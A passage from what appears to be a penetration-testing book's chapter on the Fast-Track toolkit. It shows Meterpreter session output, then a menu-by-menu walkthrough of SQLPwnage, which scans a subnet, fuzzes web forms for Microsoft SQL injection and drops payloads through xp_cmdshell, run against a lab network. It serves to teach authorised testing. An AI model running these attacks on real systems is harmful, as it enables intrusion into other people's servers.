172
Chapter 11
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (10.211.55.130:4444 -> 10.211.55.128:1030)
meterpreter >
You should now have full access to the machine using the Meterpreter
payload.
SQLPwnage
SQLPwnage
is a mass brute force attack that can be used against web applica-
tions in an attempt to find Microsoft SQL injection. SQLPwnage will scan
subnets for web servers on port 80, crawl websites, and attempt to fuzz post
parameters until it finds SQL injection. It supports both error- and blind-
based SQL injection and will handle everything from privilege escalation to
re-enabling the
xp_cmdshell
stored procedure, bypassing the Windows debug
64KB restriction, and dropping any payload you want onto the system.
Begin the configuration for this attack by selecting
Microsoft SQL Tools
from the Fast-Track main menu, followed by
SQLPwnage
, option 2, as shown
below.
SQLPwnage Main Menu:
1. SQL Injection Search/Exploit by Binary Payload Injection (BLIND)
2. SQL Injection Search/Exploit by Binary Payload Injection (ERROR BASED)
3. SQL Injection single URL exploitation
Enter your choice:
2
. . . SNIP . . .
Scan a subnet or spider single URL?
1. url
2. subnet (new)
3. subnet (lists last scan)
Enter the Number:
2
Enter the ip range, example 192.168.1.1-254:
10.211.55.1-254
Scanning Complete!!! Select a website to spider or spider all??
1. Single Website
2. All Websites
Enter the Number:
2
Attempting to Spider: http://10.211.55.128
Crawling http://10.211.55.128 (Max Depth: 100000)
DONE
Found 0 links, following 0 urls in 0+0:0:0